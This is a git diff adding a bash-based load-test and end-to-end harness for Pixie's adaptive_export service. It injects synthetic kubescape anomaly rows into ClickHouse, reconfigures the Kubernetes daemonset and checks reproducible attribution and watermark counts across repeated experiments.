+| Control plane E1 (single) | ✅ **20/20 EXACT (std=0)** after AE-1 fix |
+| Control plane E3 (fan-out) | ✅ **20/20 EXACT** (uniq=8, attrib=8) |
+| Control plane E4 (boundary collision) | ✅ **20/20 EXACT** (uniq=1, attrib=1) |
+| Control plane E2 (dedup) | ✅ **10/10 EXACT** (uniq=1, attrib=1) |
+| Control plane E6 (restart idempotency) | ✅ **1/1 EXACT** (attrib stayed 1 across AE restart) |
+| **Control plane total** | ✅ **71/71 reps EXACT (std=0)** + **E1 20/20 seconds-native** |
+| E8 sustained same-pod (control) | ✅ reproduces F8 (stall when event_time < watermark) + recovers to steady delta=1 growth |
+| Data plane E5 + E8-data | ⛔ blocked on F6 (vizier not registered); data-plane rig requested from makefile-agent; harness ready |
+| L1 hermetic (`go test`, exact bytes) | 🧰 authored; runs on a build PG (pixie module compile) |
+
+NOTE: harness is now **seconds-native** (production unit). The earlier 71/71 used nanos + a compensating
+TTL ALTER; E1 was re-confirmed **20/20 std=0 natively with seconds** + the seconds-correct DDL (no ALTER).
diff --git a/src/e2e_test/adaptive_export_loadtest/README.md b/src/e2e_test/adaptive_export_loadtest/README.md
new file mode 100644
index 00000000000..f0e94a54fdf
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/README.md
@@ -0,0 +1,72 @@
+# adaptive_export_loadtest
+
+Load-test + e2e harness for **adaptive_export (AE)** and the dx-steered SOC chain.
+There are exactly **two ways to test**, by design — pick by what you're proving:
+
+| family | needs a live SOC stack? | proves | entry point |
+|---|---|---|---|
+| **A. Fixture-isolation** | No (just ClickHouse) | AE's write behaviour is *deterministic* — injected `kubescape_logs` → exact `forensic_db` rows, across many reps | `harness/run.sh` |
+| **B. Live-attack e2e** | Yes (Pixie + kubescape + CH + AE + dx) | the real chain: attack → detection → DX-steered data-volume reduction → no-loss → NFR | `harness/log4shell_fire.sh` → `exp_matrix.sh` → `nfr.sh` → `exp_row_reconcile.sh` |
+
+`event_time` is unix **SECONDS** end-to-end (the unit the soc Vector kubescape sink emits and the CH DDL TTL/PARTITION assume). Fixtures use seconds.
+
+---
+
+## A. Fixture-isolation (offline AE proof — no Pixie)
+
+Injects *controlled* `kubescape_logs` trigger rows (real kubescape is **not** deployed) and a *counted* traffic band, then asserts exactly how much AE writes — so write behaviour is measured deterministically instead of lost in infra noise.
+
+```sh
+export KUBECONFIG=<path-to-kubeconfig> # or run lab-side with CH_NO_PF=1
+bash harness/run.sh # full suite: ae_config → E1..E4,E6 → E5
+EXP=E1 REPS=20 OUT=/tmp/E1.csv bash harness/exp_control.sh # one experiment
+EXP=E8 TICKS=25 INTERVAL=3 bash harness/exp_e8.sh # sustained same-pod (F8 reproducer)
+```
+Exact reproducibility ⇔ `harness/stats.py` reports every `*_act` metric with one distinct value (std=0).
+
+**Scripts:** `run.sh` (orchestrator) · `lib.sh` (CH/kubectl helpers) · `inject.sh` (HTTP INSERT of kubescape_logs) · `ae_config.sh` (AE single-shot load-test mode) · `exp_control.sh` (E1–E4,E6) · `exp_e5.sh` (data-plane volume) · `exp_e8.sh` (sustained same-pod / F8) · `stats.py` (reproducibility verdict).
+
+## B. Live-attack e2e (the real chain, on a deployed stack)
+
+Run on a SOC stack (Pixie vizier Healthy + kubescape netStreaming + CH `forensic_db` + AE + dx). Order:
+
+```sh
+export KUBECONFIG=<path-to-kubeconfig>
+# 1. generate the attack signal (idempotent; verifies LDAP egress before returning)
+bash harness/log4shell_fire.sh
+# 2. data-volume reduction MATRIX — ALL (firehose) vs DX (steered) × {log4shell,argocd,react2argo}
+CONDITIONS="log4shell:on react2argo:on" REPS=5 bash harness/exp_matrix.sh
+# 3. NFR — throughput, AE+dx memory under load, verdict/query latency
+bash harness/nfr.sh
+# 4. no-loss — deterministic PEM↔ClickHouse row-level reconciliation for the DX arm
+bash harness/exp_row_reconcile.sh
+```
+
+**Scripts:** `log4shell_fire.sh` (attack-signal generator, bob#140-hardened) · `exp_matrix.sh` (reduction matrix, the canonical ALL-vs-DX runner) · `nfr.sh` (throughput/mem/latency) · `exp_row_reconcile.sh` (no-loss).
+
+> The DX arm needs the load-gen pods bound to a **benign User SBoB** (`kubescape.io/managed-by: User`, `rulePolicies.R0002.processAllowed`) or benign noise gets steered and contaminates the reduction — see `biz/PoC/log4j/datavolume/denoise_sbobs/`.
+
+---
+
+## Layout
+```
+fixtures/EXPERIMENTS.md curated kubescape_logs data-set catalog + expected outputs
+harness/ the two families above
+k8s/ isolated sinks + per-rep generator pod (no probes)
+tools/loadgen/ cleanloadgen + httpsink Go sources + Dockerfile
+```
+Go unit/e2e tests for AE live with the service: `src/vizier/services/adaptive_export/internal/{trigger,e2e}/*_test.go`.
+
+See `CONTRACTS.md` (AE implied contracts) and `FINDINGS_AND_BACKLOG.md` (reproduced findings incl. the F8 watermark-poison bug).
+
+## Validation status (honest)
+
+| Experiment | Plane | Status |
+|---|---|---|
+| E1 single / E2 dedup / E3 fan-out / E4 boundary / E6 restart-idempotency | control | ✅ exactly reproducible (std=0) on a live rig |
+| E8 sustained same-pod | control | ✅ reproduced the F8 "writes-stop" bug + recovery |
+| E5 volume / E8 data-mode | data | ⏳ authored; pending live validation |
+| Live log4j reduction / NFR / no-loss (family B) | data | ✅ validated (aeprod19 + pemdq10 + dx): #33 prefetch verdict 212→18ms; reduction ALL→DX ≫ measured |
+
+## Removed (consolidation 2026-06)
+Redundant variants folded into the canonical scripts above — deleted: `ae_vs_all.sh`, `vrun.sh`, `exp_log4j_reps.sh`, `exp_datavolume_extreme.sh`, `exp_dx_steering_reduction.sh` (→ `exp_matrix.sh`); `exp_ae_nfr_benchmark.sh` (→ `nfr.sh`); `exp_pipeline_reconcile.sh` (→ `exp_row_reconcile.sh`); `exp_dx_validate.sh` (→ `exp_matrix.sh`); `deploy_ae.sh`, `build_gen_image.sh` (superseded by the live stack / kit).
diff --git a/src/e2e_test/adaptive_export_loadtest/fixtures/EXPERIMENTS.md b/src/e2e_test/adaptive_export_loadtest/fixtures/EXPERIMENTS.md
new file mode 100644
index 00000000000..35629485c37
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/fixtures/EXPERIMENTS.md
@@ -0,0 +1,45 @@
+# AE load-test experiment catalog
+
+Each experiment is a curated `kubescape_logs` data set (injected via `inject.sh`,
+real kubescape NOT deployed) plus the deterministic AE output it must produce.
+Run each ×100; **exact reproducibility ⇔ every metric has std = 0 / one distinct
+value across the 100 reps.**
+
+Two planes (see `project_ae_repro_planes`):
+- **Control plane** — `adaptive_attribution`, `trigger_watermark`: a pure
+ function of the injected rows. No Pixie, no traffic gen needed.
+- **Data plane** — `http_events`/`dns_events`/`pgsql_events`/`conn_stats`: real
+ Pixie capture of `cleanloadgen`'s sealed band; gen manifest counts are the
+ oracle. Requires the L3 topology + single-pull AE config.
+
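+Per-rep isolation: unique `--hostname aw-<exp>-<rep>` (control, watermark is
+host-partitioned) and unique `--pod gen-<exp>-<rep>` (data, AE's `df.pod` filter
+isolates each rep even with overlapping windows; against a live AE the hostname must be a real node, so the harness isolates control reps by unique pod instead). Timestamps are always passed
+explicitly (`--event-time`) in unix seconds, the production `event_time` unit; the live-rig harness passes the real current second so the per-node watermark stays monotone.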
+
+| # | Plane | Injected data set | Expected (per rep, exact unless noted) |
+|---|---|---|---|
+| **E1** single anomaly | control | 1 row: rule R0001, target (ns,pod), pid/comm fixed, `event_time=T` | `uniqExact(anomaly_hash)=1`; `adaptive_attribution` FINAL `=1`; watermark `=T` |
+| **E2** dedup / extend | control | 10 rows, SAME (pid,comm,pod,ns), distinct ↑ `event_time` (`--count 10`) | hashes `=1`; attribution FINAL `=1` (t_end extended, not multiplied); watermark `=T+9·dt` |
+| **E3** fan-out | control | K=8 rows, distinct (pod,ns), 1 each | hashes `=8`; attribution FINAL `=8` |
+| **E4** boundary collision | control | 2 rows, identical `event_time`, different RuleID, same target (`--same-time`) | deterministic fingerprint-dedup: both surface (distinct fp), hashes `=1`; watermark `=T` |
+| **E5** data-plane volume | data | 1 anomaly, `pod=gen-…`, `event_time=B1` from gen manifest; gen fires HTTP_N=100/DNS_N=100/PGSQL_N=100 in band `[B0,B1]` | `Δhttp_events=100`, `Δdns_events=100`, `Δpgsql_events=100`; `Δattribution=1`; `conn_stats` within tolerance; single-pull (no MergeTree dup inflation) |
+| **E6** watermark idempotency | control | inject E1 set, let AE process, restart AE (watermark persisted), re-run | 2nd pass: `Δ` everything `=0` (no double-count) |
+| **E7** passthrough A/B | data | canned band; `ADAPTIVE_PASSTHROUGH` 1 then 0, same load+window | exact firehose/filter ratio per table; reproducible across reps |
+
+## Timestamp coordination (data-plane, E5/E7)
+
+1. gen fires → sealed band `[B0,B1]` (node clock == Pixie `time_` == kubescape
+ `event_time`; no skew).
+2. inject fixture `--event-time B1 --pod gen-<exp>-<rep>` (B1 converted from gen-manifest nanos to unix seconds).
+3. AE config: `ADAPTIVE_WINDOW_BEFORE_SEC ≥ (B1−B0)/1e9 + margin` so window start
+ `≤ B0`; `ADAPTIVE_WINDOW_AFTER_SEC` small → window expires after ONE pull
+ (protocol tables are plain MergeTree — repeated pulls would re-insert dups).
+4. measure forensic_db deltas BEFORE the band ages out of Pixie retention.
+5. delete `gen-<exp>-<rep>` (held alive until here so upid resolves).
+
+## Default knobs
+
+- `HTTP_N=DNS_N=PGSQL_N=100` (low enough for 100% Pixie sampling, no drops).
+- `conn_stats` tolerance: `Δconn ∈ [HTTP_N, HTTP_N+5]` (new-conn-per-req + 1 pg).
+- `async_insert=0` on the ingest user so counts are stable at read time.
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/ae_config.sh b/src/e2e_test/adaptive_export_loadtest/harness/ae_config.sh
new file mode 100755
index 00000000000..1f7782e927f
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/ae_config.sh
@@ -0,0 +1,57 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# ae_config.sh — put the live adaptive-export into deterministic load-test mode.
+#
+# Sets (and rolls out) the env that makes the data-plane write exactly once per
+# anomaly window over the full sealed band:
+# ADAPTIVE_PUSH_PIXIE_ROWS=true operator pulls + writes protocol tables
+# ADAPTIVE_PUSH_REFRESH_SEC=-1 SINGLE-SHOT: one pull per window (only on
+# a rebuilt AE image carrying the new knob;
+# harmless/ignored on older images)
+# ADAPTIVE_WINDOW_BEFORE_SEC=120 window start ≤ band start (band is seconds)
+# ADAPTIVE_WINDOW_AFTER_SEC=5 member lifetime — the PRIMARY single-pull
+# lever that works on the CURRENTLY-PUBLISHED
+# image: 5s < the 30s default refresh, so the
+# window expires before any 2nd pull → each
+# window written exactly once.
+# Also applies the PL_CLOUD_ADDR :443 fix. NOTE: nothing in this script touches async_insert — it must
+# already be disabled on the ingest user so row counts are stable at read time (per the AE per-PG fixes).
+set -uo pipefail
+HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh"
+
+DS="${AE_DS:-adaptive-export}"
+log "configuring $AE_NS/$DS for single-shot load-test mode"
+
+k -n "$AE_NS" set env "ds/$DS" \
+ ADAPTIVE_PUSH_PIXIE_ROWS=true \
+ ADAPTIVE_PUSH_REFRESH_SEC=-1 \
+ ADAPTIVE_WINDOW_BEFORE_SEC=120 \
+ ADAPTIVE_WINDOW_AFTER_SEC=5 \
+ >/dev/null || die "failed to set load-test env on $AE_NS/ds/$DS"
+
+# PL_CLOUD_ADDR :443 fix (idempotent: only patched when the value has no ':') — without it AE crashloops / 0 writes.
+CUR="$(k -n "$AE_NS" get cm pl-cloud-config -o jsonpath='{.data.PL_CLOUD_ADDR}' 2>/dev/null || true)"
+if [[ -n "$CUR" && "$CUR" != *:* ]]; then
+ log "patching PL_CLOUD_ADDR $CUR -> ${CUR}:443"
+ k -n "$AE_NS" patch cm pl-cloud-config --type merge -p "{\"data\":{\"PL_CLOUD_ADDR\":\"${CUR}:443\"}}" >/dev/null || die "failed to patch PL_CLOUD_ADDR in $AE_NS/pl-cloud-config"
+fi
+
+k -n "$AE_NS" rollout restart "ds/$DS" >/dev/null || die "rollout restart of $AE_NS/ds/$DS failed"
+k -n "$AE_NS" rollout status "ds/$DS" --timeout=180s || die "rollout of $AE_NS/ds/$DS did not complete within 180s"
+log "AE configured + rolled out"
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_control.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_control.sh
new file mode 100755
index 00000000000..783aad584d0
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_control.sh
@@ -0,0 +1,115 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# exp_control.sh — control-plane reproducibility (E1..E4, E6). No Pixie, no gen:
+# inject curated kubescape_logs fixtures and assert the deterministic control
+# surface (adaptive_attribution FINAL + uniqExact(anomaly_hash) + watermark).
+#
+# Live-AE constraint: hostname MUST be a real node (AE polls per-node). Per-rep
+# isolation is by UNIQUE POD (distinct anomaly_hash) + monotone event_time.
+#
+# Usage: EXP=E1 REPS=100 OUT=/tmp/e1.csv ./exp_control.sh (EXP in E1 E2 E3 E4 E6)
+set -uo pipefail
+HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh"
+INJECT="$HERE/inject.sh"
+
+EXP="${EXP:-E1}"
+REPS="${REPS:-100}"
+NODE="${NODE:-$(first_node)}"
+OUT="${OUT:-/tmp/aeload_${EXP}.csv}"
+
+ch_portforward_up
+[[ -n "$NODE" ]] || die "no node resolved (set NODE=)"
+log "EXP=$EXP node=$NODE reps=$REPS"
+warmup "$NODE" # absorb AE trigger cold-start so rep 1 is steady-state
+
+inj(){ "$INJECT" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" --hostname "$NODE" "$@" >&2; }
+# settle: fixed pause (SETTLE_S, default 3s) for AE's 250ms trigger poll + write to land; the rep loop below polls with wait_attrib instead of calling it.
+settle(){ sleep "${SETTLE_S:-3}"; }
+
+echo "rep,exp,uniq_exp,uniq_act,attrib_exp,attrib_act,wm_exp,wm_act,pass" | tee "$OUT"
+WM_PREV=0 # for monotonicity check (trigger_watermark persists on a ~5s throttle)
+
+for rep in $(seq 1 "$REPS"); do
+ # event_time = REAL current second. The trigger watermark is a strict
+ # high-water-mark (contract C3 / F8): future-dated stamps (BASE+rep*N) push
+ # the watermark ahead of wall-clock, so later experiments' now-based stamps
+ # fall BELOW it and are silently dropped. now_s keeps the watermark tracking
+ # real time → monotone across experiments on the same (per-node) hostname.
+ T="$(now_s)"
+ R="$(printf '%03d' "$rep")" # zero-pad → collision-proof LIKE filters
+ filt=""; uexp=1; aexp=1; wmexp="$T"; idemp=""
+ case "$EXP" in
+ E1) # single anomaly
+ filt="cp-e1-${R}"
+ inj --ns aeload --pod "$filt" --rule R0001 --pid 1234 --comm java --event-time "$T" || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; }
+ ;;
+ E2) # dedup / extend: 10 rows, same target, 1s apart → 1 hash, 1 row
+ filt="cp-e2-${R}"; wmexp="$((T + 9))"
+ inj --ns aeload --pod "$filt" --rule R0001 --pid 1234 --comm java --event-time "$T" --count 10 --dt-s 1 || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; }
+ sleep 8 # let all 10 rows (spanning 9s) be polled before measuring
+ ;;
+ E3) # fan-out: 8 distinct pods → 8 hashes. Same event_time (now_s) for all 8 —
+ # distinct pods → distinct content fingerprints → all 8 surface (boundary
+ # dedup is per-fingerprint), and the watermark only advances to now_s.
+ filt="cp-e3-${R}-"; K=8; uexp="$K"; aexp="$K"; wmexp=""
+ ok=1
+ for j in $(seq 1 "$K"); do
+ inj --ns aeload --pod "${filt}${j}" --rule R0001 --pid "$((1234+j))" --comm java --event-time "$T" || ok=0
+ done
+ [[ "$ok" == 1 ]] || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; }
+ ;;
+ E4) # boundary collision: 2 rows, same event_time, different RuleID, same target → 1 hash. BOTH inserts must land or the rep is void.
+ filt="cp-e4-${R}"
+ inj --ns aeload --pod "$filt" --rule R0001 --pid 1234 --comm java --event-time "$T" --same-time || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; }
+ inj --ns aeload --pod "$filt" --rule R0010 --pid 1234 --comm java --event-time "$T" --same-time || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; }
+ ;;
+ E6) # watermark idempotency across AE restart
+ filt="cp-e6-${R}"
+ inj --ns aeload --pod "$filt" --rule R0001 --pid 1234 --comm java --event-time "$T" || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; }
+ wait_attrib "$NODE" "$filt" 1 20 >/dev/null
+ a1="$(attrib_count "$NODE" "$filt")"
+ k -n "$AE_NS" rollout restart "ds/${AE_DS:-adaptive-export}" >/dev/null 2>&1 || true
+ k -n "$AE_NS" rollout status "ds/${AE_DS:-adaptive-export}" --timeout=180s >/dev/null 2>&1 || true
+ sleep 8
+ # a1 is the PRE-restart baseline (must be exactly 1); the POST-restart count is gated by the generic attrib check below (no double-count)
+ [[ "$a1" == "1" ]] || idemp="FAIL_idemp_a1=${a1}"
+ ;;
+ *) die "unknown EXP=$EXP";;
+ esac
+
+ # Poll until AE has written the expected attribution rows (steady-state),
+ # then read the deterministic counts. wm is persistence-throttled (~5s) so it
+ # is reported + checked for MONOTONICITY only, never a hard gate.
+ aact="$(wait_attrib "$NODE" "$filt" "$aexp" "${MEAS_TIMEOUT:-25}")"
+ uact="$(uniq_hashes "$NODE" "$filt")"
+ wm="$(watermark_of "$NODE")"
+
+ pass="PASS"
+ [[ "$uact" == "$uexp" ]] || pass="FAIL_uniq"
+ [[ "$aact" == "$aexp" ]] || pass="${pass}|FAIL_attrib"
+ [[ -z "$idemp" ]] || pass="${pass}|${idemp}"
+ # watermark: must never go backwards (persisted value lags but is monotone).
+ if [[ "${wm:-0}" -lt "${WM_PREV:-0}" ]]; then pass="${pass}|FAIL_wm_regress"; fi
+ WM_PREV="$wm"
+
+ echo "$rep,$EXP,$uexp,$uact,$aexp,$aact,$wmexp,$wm,$pass" | tee -a "$OUT"
+done
+
+log "$EXP done -> $OUT"
+python3 "$HERE/stats.py" "$OUT" || true
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_e5.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_e5.sh
new file mode 100755
index 00000000000..d9237672aa5
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_e5.sh
@@ -0,0 +1,98 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# exp_e5.sh — E5 live data-plane reproducibility: real Pixie captures a counted,
+# sealed, pod-pinned band; AE pulls it ONCE; we assert the forensic_db deltas
+# equal the generator's ground truth, across REPS reps.
+#
+# Output CSV (stdout + $OUT): rep,http_exp,http_act,dns_exp,dns_act,pgsql_exp,
+# pgsql_act,conn_est,conn_act,attrib,uniq_hash,wm_exp,wm_act,pass
+#
+# Usage: REPS=100 HTTP_N=100 DNS_N=100 PGSQL_N=100 OUT=/tmp/e5.csv ./exp_e5.sh
+set -uo pipefail
+HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh"
+INJECT="$HERE/inject.sh"
+
+REPS="${REPS:-100}"
+HTTP_N="${HTTP_N:-100}"; DNS_N="${DNS_N:-100}"; PGSQL_N="${PGSQL_N:-100}"
+CONN_TOL="${CONN_TOL:-5}" # conn_stats tolerance: accepted band is [conn_est, conn_est+CONN_TOL], conn_est taken from the gen manifest
+SETTLE_S="${SETTLE_S:-4}" # Stirling flush settle before injecting
+PULL_TIMEOUT="${PULL_TIMEOUT:-40}" # max wait for AE single-pull to land
+OUT="${OUT:-/tmp/aeload_e5.csv}"
+
+ch_portforward_up
+apply_sinks
+# Absorb the AE trigger cold-start on every node (gen pods may land on any node).
+for n in $(nodes_list); do warmup "$n"; done
+
+echo "rep,http_exp,http_act,dns_exp,dns_act,pgsql_exp,pgsql_act,conn_est,conn_act,attrib,uniq_hash,wm_exp,wm_act,pass" | tee "$OUT"
+
+for rep in $(seq 1 "$REPS"); do
+ name="gen-e5-$(printf '%03d' "$rep")" # zero-pad → collision-proof LIKE filter
+
+ mani="$(fire_gen "$name" "$HTTP_N" "$DNS_N" "$PGSQL_N")" || { del_gen "$name"; echo "$rep,,,,,,,,,,,,,FIRE_FAIL" | tee -a "$OUT"; continue; }
+ b1="$(jget "$mani" b1)" # band end, unix NANOS (gen clock)
+ b1_s=$(( b1 / 1000000000 )) # → unix SECONDS = production event_time unit
+ http_exp="$(jget "$mani" http)"; dns_exp="$(jget "$mani" dns)"; pgsql_exp="$(jget "$mani" pgsql)"
+ conn_est="$(jget "$mani" conn_tcp_est)"
+ # Fixture hostname MUST be the node the gen pod landed on, so the AE pod on
+ # that node reads the trigger (AE polls kubescape_logs WHERE hostname=node).
+ node="$(jget "$mani" node)"
+ [[ -n "$node" ]] || { del_gen "$name"; echo "$rep,,,,,,,,,,,,,NO_NODE" | tee -a "$OUT"; continue; }
+
+ sleep "$SETTLE_S" # let the band flush into Pixie before the window query
+
+ # Inject the single trigger fixture pinned to THIS rep's pod, event_time=B1.
+ "$INJECT" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" \
+ --ns "$AELOAD_NS" --pod "$name" --rule R0001 --pid 1234 --comm java \
+ --event-time "$b1_s" --hostname "$node" >&2 \
+ || { del_gen "$name"; echo "$rep,,,,,,,,,,,,,INJECT_FAIL" | tee -a "$OUT"; continue; }
+
+ # Wait for AE's single pull to land (http_events for this pod reaches exp, or
+ # timeout). The pod stays alive (held) so upid resolves during the pull.
+ http_act=0
+ for _ in $(seq 1 "$PULL_TIMEOUT"); do
+ http_act="$(count_pod http_events "$name")"
+ [[ "$http_act" -ge "$http_exp" ]] && break
+ sleep 1
+ done
+ dns_act="$(count_pod dns_events "$name")"
+ pgsql_act="$(count_pod pgsql_events "$name")"
+ conn_act="$(count_pod conn_stats "$name")"
+ attrib="$(attrib_count "$node" "$name")"
+ uhash="$(uniq_hashes "$node" "$name")"
+ wm_act="$(watermark_of "$node")"
+
+ pass="PASS"
+ [[ "$http_act" == "$http_exp" ]] || pass="FAIL_http"
+ [[ "$dns_act" == "$dns_exp" ]] || pass="${pass}|FAIL_dns"
+ [[ "$pgsql_act" == "$pgsql_exp" ]] || pass="${pass}|FAIL_pgsql"
+ [[ "$attrib" == "1" ]] || pass="${pass}|FAIL_attrib"
+ # watermark persists on a ~5s throttle → report only (WARN), don't hard-gate.
+ [[ "$wm_act" == "$b1_s" ]] || pass="${pass}|WARN_wm"
+ # conn_stats: tolerance gate (sampled cumulative counters), not exact.
+ if [[ "$conn_act" -lt "$conn_est" || "$conn_act" -gt $((conn_est + CONN_TOL)) ]]; then
+ pass="${pass}|WARN_conn"
+ fi
+
+ echo "$rep,$http_exp,$http_act,$dns_exp,$dns_act,$pgsql_exp,$pgsql_act,$conn_est,$conn_act,$attrib,$uhash,$b1_s,$wm_act,$pass" | tee -a "$OUT"
+ del_gen "$name"
+done
+
+log "E5 done -> $OUT"
+python3 "$HERE/stats.py" "$OUT" || true
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_e8.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_e8.sh
new file mode 100755
index 00000000000..e194733f932
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_e8.sh
@@ -0,0 +1,98 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# exp_e8.sh — SUSTAINED same-pod-over-time: the bug-hunt for "writes succeed
+# initially, then STOP, while the data is still on the Pixie side."
+#
+# One long-lived pod keeps producing NEW kubescape anomalies over time. A healthy
+# AE keeps processing every new anomaly: adaptive_attribution.n_anomalies grows,
+# last_seen advances, the active window stays open, and (data mode) protocol rows
+# keep being written. A STALL — n_anomalies / last_seen freezing while we keep
+# injecting — reproduces the production symptom.
+#
+# MODE=control (default): inject anomalies + track n_anomalies/last_seen/watermark
+# over TICKS. No Pixie needed. Catches a trigger/watermark/dedup-side stall.
+# MODE=data: ALSO run a held gen pod producing continuous HTTP/DNS/PGSQL traffic,
+# and track per-pod protocol-table row growth (needs a registered vizier).
+#
+# event_time is unix SECONDS (production unit). BURST>1 injects BURST anomalies at
+# the SAME event_time per tick — the realistic "many R0001 in one second" shape
+# that probes the watermark-boundary fingerprint dedup (prime suspect).
+#
+# Usage: MODE=control TICKS=40 INTERVAL=3 BURST=1 OUT=/tmp/e8.csv ./exp_e8.sh
+set -uo pipefail
+HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh"
+INJECT="$HERE/inject.sh"
+
+MODE="${MODE:-control}"
+TICKS="${TICKS:-40}"
+INTERVAL="${INTERVAL:-3}" # seconds between ticks
+BURST="${BURST:-1}" # anomalies per tick (same event_time if >1)
+NODE="${NODE:-$(first_node)}"
+OUT="${OUT:-/tmp/aeload_e8_${MODE}.csv}"
+POD="${POD:-sus-$(now_s)}" # the one sustained pod under test
+
+ch_portforward_up
+[[ -n "$NODE" ]] || die "no node resolved"
+log "E8 sustained: mode=$MODE node=$NODE pod=$POD ticks=$TICKS interval=${INTERVAL}s burst=$BURST"
+if [[ "$MODE" == "data" ]]; then for _n in $(nodes_list); do warmup "$_n"; done; else warmup "$NODE"; fi # data mode re-targets NODE to the gen pod's node below, so warm every node (as exp_e5.sh does)
+
+GEN=""
+if [[ "$MODE" == "data" ]]; then
+ apply_sinks
+ GEN="$POD" # the gen pod name == the fixture pod (df.pod filter isolates it)
+ # Long-lived gen that keeps firing: we re-fire by leaving it running and
+ # re-injecting triggers; the gen's band is its startup burst, but the active
+ # window re-queries the SAME pod each tick. (Continuous-traffic gen variant is
+ # a follow-up; this already exercises sustained re-query of one pod.)
+ fire_gen "$GEN" "${HTTP_N:-100}" "${DNS_N:-100}" "${PGSQL_N:-100}" >/dev/null || die "gen fire failed"
+ node="$(k -n "$AELOAD_NS" get pod "$GEN" -o jsonpath='{.spec.nodeName}' 2>/dev/null)"; [[ -n "$node" ]] && NODE="$node"
+ log "data mode: gen $GEN on node $NODE"
+fi
+
+echo "tick,t_unix,event_time,n_anomalies,last_seen,watermark,http_rows,delta_n,status" | tee "$OUT"
+prev_n=0
+for tick in $(seq 1 "$TICKS"); do
+ T="$(now_s)"
+ # Inject BURST anomalies for the SAME pod at this tick's event_time (inject failures are tolerated: a missed tick shows up as STALL).
+ if [[ "$BURST" -gt 1 ]]; then
+ "$INJECT" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" \
+ --hostname "$NODE" --ns "$AELOAD_NS" --pod "$POD" --rule R0001 --pid 1234 --comm java \
+ --event-time "$T" --count "$BURST" --same-time >&2 || true
+ else
+ "$INJECT" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" \
+ --hostname "$NODE" --ns "$AELOAD_NS" --pod "$POD" --rule R0001 --pid 1234 --comm java \
+ --event-time "$T" >&2 || true
+ fi
+ sleep "$INTERVAL"
+
+ n="$(attr_field "$NODE" "$POD" n_anomalies)"
+ ls="$(attr_field "$NODE" "$POD" 'toUnixTimestamp(last_seen)')"
+ wm="$(watermark_of "$NODE")"
+ http="0"; [[ "$MODE" == "data" ]] && http="$(count_pod http_events "$POD")"
+ delta=$(( ${n:-0} - prev_n ))
+ status="OK"
+ [[ "$tick" -gt 1 && "$delta" -le 0 ]] && status="STALL" # n_anomalies stopped growing
+ prev_n="${n:-0}"
+ echo "$tick,$T,$T,$n,$ls,$wm,$http,$delta,$status" | tee -a "$OUT"
+done
+
